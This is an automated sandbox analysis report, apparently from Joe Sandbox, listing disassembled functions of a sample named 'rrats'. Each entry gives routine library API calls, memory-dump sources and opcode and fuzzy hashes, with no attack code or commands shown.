                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: CallbackDispatcherItemUser
                                                              • String ID:
                                                              • API String ID: 4250310104-0
                                                              • Opcode ID: faa60721a992c0b10927e51ebe193e5afcf9d23820ef9fd4b03f29b4b344dc32
                                                              • Instruction ID: fcb29f8f3c9ff7aafbf5272f273a514b75e544f3651fd474ca12207aa77eb708
                                                              • Opcode Fuzzy Hash: faa60721a992c0b10927e51ebe193e5afcf9d23820ef9fd4b03f29b4b344dc32
                                                              • Instruction Fuzzy Hash: 33C00276408340BECB015BA09C0892BBBA9AB99311B04C809B1A9C0220C6358520DB22
                                                              Function 00CA1A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: 06f589250ea5cd0b4b557afc9cf1ca550cb546139e579e3163468bf61aa8c346
                                                              • Instruction ID: 8cb0917ee35e81019c97e0b45078d89fc6d4bb154380658aa573dedea478b2ee
                                                              • Opcode Fuzzy Hash: 06f589250ea5cd0b4b557afc9cf1ca550cb546139e579e3163468bf61aa8c346
                                                              • Instruction Fuzzy Hash: 95C1B270A002569FEF15DF68C498BAD7BA5AF16318F0C01BAEC559F392DB309A44CB61
                                                              Function 00CA3BBA Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: 0256b303a4e6d9c0beff14f4261af1548223997c56012ab4d2b8ae1655494651
                                                              • Instruction ID: 60fe286bca3253e9f081afe30bd0c40e12f8b656a512a398412c86309ded017b
                                                              • Opcode Fuzzy Hash: 0256b303a4e6d9c0beff14f4261af1548223997c56012ab4d2b8ae1655494651
                                                              • Instruction Fuzzy Hash: C371E371500B869ECB35DB70CC659E7B7E9AF16308F40092EF5AB87241DA326A84DF11
                                                              Function 00CA8284 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00CA8289
                                                                • Part of subcall function 00CA13DC: __EH_prolog.LIBCMT ref: 00CA13E1
                                                                • Part of subcall function 00CAA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00CAA598
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: H_prolog$CloseFind
                                                              • String ID:
                                                              • API String ID: 2506663941-0
                                                              • Opcode ID: ed78d59c1bad5442aca094409eec97ae0a1d768379d413f4cc84c72b54b1d47a
                                                              • Instruction ID: f2149ea4ffa1f45331ee09f66ef75a1c66fa2eb9167eda1bdd9c3b2fc1859960
                                                              • Opcode Fuzzy Hash: ed78d59c1bad5442aca094409eec97ae0a1d768379d413f4cc84c72b54b1d47a
                                                              • Instruction Fuzzy Hash: BB41D97194465A9BDF20DBA0CC55BEAB7B8AF05308F4404EBE59A97093EB705FC8DB10
                                                              Function 00CA13E1 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00CA13E1
                                                                • Part of subcall function 00CA5E37: __EH_prolog.LIBCMT ref: 00CA5E3C
                                                                • Part of subcall function 00CACE40: __EH_prolog.LIBCMT ref: 00CACE45
                                                                • Part of subcall function 00CAB505: __EH_prolog.LIBCMT ref: 00CAB50A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: 1b5e8fee8dd210be994fb1259bdad8dc7de02b03f3c1f017d35dbe54f0d59fbf
                                                              • Instruction ID: fbde5d6e3b03f00f26118e1160291529480a6ec351ab9a8ee8adb268dd89c61c
                                                              • Opcode Fuzzy Hash: 1b5e8fee8dd210be994fb1259bdad8dc7de02b03f3c1f017d35dbe54f0d59fbf
                                                              • Instruction Fuzzy Hash: 054147B0905B419EE724CF798885AE6FBE5BF19304F54492EE5FE83282CB316654DB10
                                                              Function 00CA13DC Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00CA13E1
                                                                • Part of subcall function 00CA5E37: __EH_prolog.LIBCMT ref: 00CA5E3C
                                                                • Part of subcall function 00CACE40: __EH_prolog.LIBCMT ref: 00CACE45
                                                                • Part of subcall function 00CAB505: __EH_prolog.LIBCMT ref: 00CAB50A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: 2efb44216400c9672d5ad5f3987943baf1283b97276c84d418fffecc37ad0f23
                                                              • Instruction ID: 5574314b0bf98540ad5c99fa6bb88a3bb48103ee7335f4a1cb3b001bac8be482
                                                              • Opcode Fuzzy Hash: 2efb44216400c9672d5ad5f3987943baf1283b97276c84d418fffecc37ad0f23
                                                              • Instruction Fuzzy Hash: 714168B0905B419EE724CF798885AE7FBE5BF19300F54492ED5FE83282CB316654DB10
                                                              Function 00CB359E Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: 9beb1f1dd564a1f5a85941504df7241389991e0d412ed4b1007bee93af85dee3
                                                              • Instruction ID: 7e9003a1a61ed48475332f1612a3ccb6628f78654334a2b08ea9166d3db3cb6f
                                                              • Opcode Fuzzy Hash: 9beb1f1dd564a1f5a85941504df7241389991e0d412ed4b1007bee93af85dee3
                                                              • Instruction Fuzzy Hash: 8621B1B1E40255ABDB149F79CC41AEA77A8FB19714F14023EE516EB781D7B09E00C6A8
                                                              Function 00CBB093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00CBB098
                                                                • Part of subcall function 00CA13DC: __EH_prolog.LIBCMT ref: 00CA13E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: 73a5b0466e4787edf03a81929f299e0877f41f5d56fc2b816c4237ab1cf318f1
                                                              • Instruction ID: 7b94e55d2d1876aebde0e1fccbc3e4102df2a8aefeaf04ebcdc1ced736083634
                                                              • Opcode Fuzzy Hash: 73a5b0466e4787edf03a81929f299e0877f41f5d56fc2b816c4237ab1cf318f1
                                                              • Instruction Fuzzy Hash: BD316B75C0024AAECF15DFA9D851AEEBBB4AF09304F14449EE80AB7242D775AF04DB61
                                                              Function 00CCAC98 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00CCACF8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AddressProc
                                                              • String ID:
                                                              • API String ID: 190572456-0
                                                              • Opcode ID: c1f79f39034a3761fef784f032f43102851288a8ca8eaa6258bee92c9f76841e
                                                              • Instruction ID: 32c009f9b490696ba17fd7d7969eb92c8338e2c2280fb467e6e42d83479ae3e4
                                                              • Opcode Fuzzy Hash: c1f79f39034a3761fef784f032f43102851288a8ca8eaa6258bee92c9f76841e
                                                              • Instruction Fuzzy Hash: 84113A33A012396F8F219F1DDC88F5A7395EB843287164225FD26EB244D731DD0187D2
                                                              Function 00CA9215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: eda4e6d7afcc9ffffb5099c448ad591eebaee2ceb9efbafc7b9d266e5e0ec1d9
                                                              • Instruction ID: d8b47f7235fbd6ecf5f3cb8216032b308d2a50839162fba735ace37f78154178
                                                              • Opcode Fuzzy Hash: eda4e6d7afcc9ffffb5099c448ad591eebaee2ceb9efbafc7b9d266e5e0ec1d9
                                                              • Instruction Fuzzy Hash: 1801A933D00526ABCF11AB68CC82ADEB731FF8A754F054215F813B7151DA348D00D7A0
                                                              Function 00CCC479 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00CCB136: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00CC9813,00000001,00000364,?,00CC40EF,?,?,00CE1098), ref: 00CCB177
                                                              • _free.LIBCMT ref: 00CCC4E5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap_free
                                                              • String ID:
                                                              • API String ID: 614378929-0
                                                              • Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                              • Instruction ID: 872a585359015c3ddd06e0a6c8a157f4de8b4457ce9ebc01a2bedffffbb2e35f
                                                              • Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                              • Instruction Fuzzy Hash: 4A01D6726003056BE335CE69D885E6AFBEDEB85370F25451DE59893281EA30A905C764
                                                              Function 00CCB136 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00CC9813,00000001,00000364,?,00CC40EF,?,?,00CE1098), ref: 00CCB177
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: d12130144de017966c909c29c09a7b099cdb54f8589aae662ab50801ba169cb0
                                                              • Instruction ID: 7e59f13d82fe2537bf3b66a083ba31c1ed47a466a1898d9e4eca3c030cafff26
                                                              • Opcode Fuzzy Hash: d12130144de017966c909c29c09a7b099cdb54f8589aae662ab50801ba169cb0
                                                              • Instruction Fuzzy Hash: 97F0543250556567DB215AA2EC1BF9F7748EB41770F1D8219F81896190CB21DE0196E0
                                                              Function 00CC3C0D Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00CC3C3F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AddressProc
                                                              • String ID:
                                                              • API String ID: 190572456-0
                                                              • Opcode ID: 28b28a942fb19f75631541f16bb5e5dc503f3e9f6f22e3d58120cbae4dbbb5c7
                                                              • Instruction ID: ef1a07cb5b562f6e9f0231cac67ffb6d77b70a2be5b11eb45af418ff1f576b68
                                                              • Opcode Fuzzy Hash: 28b28a942fb19f75631541f16bb5e5dc503f3e9f6f22e3d58120cbae4dbbb5c7
                                                              • Instruction Fuzzy Hash: 57F0A7362002969FCF124E69FC04F9E7799EF01B60714C229FA25E7190DB31DB20D7A0
                                                              Function 00CC8E06 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(00000000,?,?,?,00CC4286,?,0000015D,?,?,?,?,00CC5762,000000FF,00000000,?,?), ref: 00CC8E38
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: e474eaf85e22324db0a9141ed0d9c102efd4751cd596c73c6598afd2f3de9be5
                                                              • Instruction ID: e89f3fcff941e8464eb54fcee098f40e37034a79d347675917e07362885205e9
                                                              • Opcode Fuzzy Hash: e474eaf85e22324db0a9141ed0d9c102efd4751cd596c73c6598afd2f3de9be5
                                                              • Instruction Fuzzy Hash: D3E06D3960622566EB7126A6DC09F9F76489B817B4F15012DEC2896592CF21CE0592E1
                                                              Function 00CA5ABD Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00CA5AC2
                                                                • Part of subcall function 00CAB505: __EH_prolog.LIBCMT ref: 00CAB50A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: 9c9fc3c2ab68bda1f2d31a6a3680170e5fea35bb9611feab4a938128cc7e4804
                                                              • Instruction ID: 88471ded6a780e408572fee993c4f5c9d3ac52ae9b0f5c1d289840b6051a24f5
                                                              • Opcode Fuzzy Hash: 9c9fc3c2ab68bda1f2d31a6a3680170e5fea35bb9611feab4a938128cc7e4804
                                                              • Instruction Fuzzy Hash: C3018C30810694DAD729E7B8C0417DEFBB49F64308F60848EA85653283CBB41B08E7A2
                                                              Function 00CAA56D Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00CAA69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00CAA592,000000FF,?,?), ref: 00CAA6C4
                                                                • Part of subcall function 00CAA69B: FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,?,?,?,00CAA592,000000FF,?,?), ref: 00CAA6F2
                                                                • Part of subcall function 00CAA69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00CAA592,000000FF,?,?), ref: 00CAA6FE
                                                              • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00CAA598
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: Find$FileFirst$CloseErrorLast
                                                              • String ID:
                                                              • API String ID: 1464966427-0
                                                              • Opcode ID: 7271c7d6d5f472a0c76357ae583676ebad3d6433865c57dd79861e3da53750a2
                                                              • Instruction ID: c765d1c8c006efb9ed904824350b9851f5e24886d95b075237d32bd962d63aaf
                                                              • Opcode Fuzzy Hash: 7271c7d6d5f472a0c76357ae583676ebad3d6433865c57dd79861e3da53750a2
                                                              • Instruction Fuzzy Hash: C5F08231409791ABCB225BB48904BCBBB906F1B339F048A4AF1FD52196C37554A4EB23
                                                              Function 00CB0E08 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetThreadExecutionState.KERNEL32(00000001), ref: 00CB0E3D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
